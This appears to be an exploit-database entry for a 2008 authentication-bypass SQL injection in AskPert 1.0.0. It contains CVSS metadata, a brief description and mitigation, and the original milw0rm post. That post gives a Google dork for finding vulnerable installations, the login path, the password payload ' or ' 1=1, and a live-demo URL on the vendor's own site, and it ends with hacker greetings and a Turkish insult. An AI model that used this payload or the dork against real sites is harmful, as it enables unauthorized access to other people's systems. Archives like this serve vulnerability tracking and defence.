header-logo
Suggest Exploit
vendor:
AskPert
by:
TR-ShaRk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AskPert
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:w3matter:askpert:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AskPert (Auth bypass) SQL Injection Vulnerability

AskPert is prone to an authentication bypass vulnerability due to a failure to properly sanitize user-supplied input. An attacker can exploit this issue to gain access to the application and perform unauthorized actions. This issue affects AskPert version 1.0.0; other versions may also be vulnerable.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to manipulate the logic of an application.
Source

Exploit-DB raw data:

##################WwW.TR-ShaRk.Co.cC###################
#AskPert  (Auth bypass) SQL Injection Vulnerability
##################WwW.TR-ShaRk.Co.cC###################

 ##################WwW.TR-ShaRk.Co.cC###################
 #[~] Author :  TR-ShaRk
 #[~] Msn : Starhack@tr-shark.org
 #[~] Web : WwW.TR-ShaRk.Co.cC
 #[~] I am Not Hacker
 #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
 #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
 #
 #[!] Script: http://www.w3matter.com/products/askpert
 #[!] Google_Dork:  Powered by AskPert
 ##################WwW.TR-ShaRk.Co.cC###################


 Go to ask/index.php?section=user&action=login

 Use following information to bypass login.

 Write any email Address as email address.It must to be in email format.

 For exapmple Starhack@TR-ShaRk.OrG

 For password use ' or ' 1=1


 #[~] LiveDemo:
 http://www.w3matter.com/ask/index.php?section=user&action=login

 ##################WwW.TR-ShaRk.Co.cC###################
 Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin!
 ##################WwW.TR-ShaRk.Co.cC###################

# milw0rm.com [2008-11-19]